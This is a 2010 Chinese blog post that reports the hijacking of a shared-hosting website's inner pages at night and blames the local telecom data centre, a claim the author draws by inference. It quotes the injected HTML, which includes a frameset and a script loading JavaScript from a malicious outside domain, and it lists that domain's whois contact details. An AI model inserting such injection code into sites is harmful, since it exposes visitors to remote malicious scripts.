飘易博客(作者:Flymorn)
订阅《飘易博客》RSS,第一时间查看最新文章!
飘易首页 | 留言本 | 关于我 | 订阅Feed

浙江丽水电信劫持用户网站!

Author:flymorn Source:Flymorn
Categories:网络技术 PostTime:2010-4-25 23:36:38
正 文:
    飘易在紫田网络租用了一个20人合租服务器空间,可是最近却出现了疑似ARP劫持的现象。我所在服务器的ip为61.174.63.177,是浙江丽水电信机房的。

    这种疑似ARP的攻击表现为:
1、网站首页正常,但是除了首页外,其他任何内页全部被替换内容;(网页文件下载后检查没有被插入木.马);
2、用IE浏览器或IE核心的浏览器查看网页时,表现为网页标题不能显示,右键查看源码,不能发现被替换的代码;这点比较隐蔽。
3、白天的时候没有被替换,只有晚上人少的时候,这种ARP现象才开始出现。(白天还不敢劫持,到了晚上估计网站值班人员都下班了,电信就开始劫持了)

    使用Chrom、Firefox浏览器查看网页源码就可以发现整个网页源码被替换成类似下面的代码:

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
****************="";}
}
</script>
<script src="http://www.chaoguqu.com/plus/v64.js"></script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/*.html?updatedata=index">
<frame name="hi" src="">
</frameset>
</html>

    其中,js script脚本中的地址 http://www.chaoguqu.com/plus/v64.js 中v64.js 可能会出现其他形式,比如 v54.js、v44.js 等。同时,使用chrome会提示 www.chaoguqu.com 这个网站是恶意病毒网站。

    从服务器上的ARP防火墙来看,服务器并没有受到ARP攻击记录。据知情人士透露,前阵子广东电信有发生过电信劫持过用户网站的事,将用户网站的页面以类似上面的方式替换成淘宝广告,以获取秘密利润,后来客户投诉到工信部,广东电信才停止这种劫持用户网站的行为。

    据此推断,浙江丽水电信的机房也很有可能被电信劫持,而且这种劫持方式十分隐蔽,用户不注意的话,或者用户对网络技术缺乏,根本无法发现自己的网站被电信劫持。

    飘易上面提到的3点现象,无一不说明了这是电信有人恶意的在“偷偷摸摸”的干坏事。浙江丽水电信啊,你们拿着客户的钱,背地里却干着见不得人的勾当,有多无耻就有多无耻的。

    再来看 www.chaoguqu.com 这个破网站,炒股去?域名的whois信息如下:

管理人联系:
Domain Name : chaoguqu.com
Creation Date : 2009-11-18 17:52:37
更新时间 : 2009-11-18 17:52:36
过期时间 : 2010-11-18 17:52:34
Name : wen xiao qiong
Organization : wen xiao qiong
Address : xia men ruan jian yuan hao lou
City : xia men
Province/State : FJ
Country : CN
Postal Code : 361000
Phone Number : 86-0722-4890224
Fax : 86-0722-4890224
Email : 147013333@qq.com

    是一个09年底注册的域名。持有人是厦门软件园的 wen xiao qiong,不知道真实与否。该网站的下方全是一堆的黑链,关于地下城与勇士DNF及其外.挂的。这里是一个巨大的黑色利润链,是否内外有人勾结,不得而知。

    在连续几天晚上都出现这种ARP现象后,我不得不联系IDC帮我更换了机房。浙江丽水电信,别了。
作者:flymorn
来源:Flymorn
版权所有。转载时必须以链接形式注明作者和原始出处及本声明。
上一篇:解决The selected file was generated by mysqldump...
下一篇:Php比较字符串相似度函数的利用
12条评论 “浙江丽水电信劫持用户网站!”
2010-4-26 14:03:02
突然在网上看到,过来看看
<a href='http://www.zhuliangliang.org'>http://www.zhuliangliang.org</a>
2010-4-28 23:05:06
紫田20人你那还有位置没?几钱一年啊?
2010-5-4 16:52:35
赞个```
2010-5-4 21:14:53
这种行为真是无语了
5 冰角
2010-5-6 10:26:33
无语了中....
2010-5-6 19:04:22
现在的互联网陷阱多
2010-5-18 21:18:38
此类现象 普遍存在哦……
哎……
8 睡人
2010-6-13 19:55:41
电信垄断,没有办法。
9 睡人
2010-6-13 19:56:32
唉。现实就是这样。为了利益,总有人恬不知耻。
2010-8-24 13:52:59
中国的电信产业一直在做这些事。

什么电信呀,什么网通铁通都在做!
2010-10-10 23:39:16
生活在天朝的淫威之下!不得不屈服!!
2010-12-16 8:04:38
sine安全                   sine
发表评论
名称(*必填)
邮件(选填)
网站(选填)

记住我,下次回复时不用重新输入个人信息
© 2007-2010 飘易博客 Www.Piaoyi.Org 原创文章版权由飘易所有 渝ICP备07006361号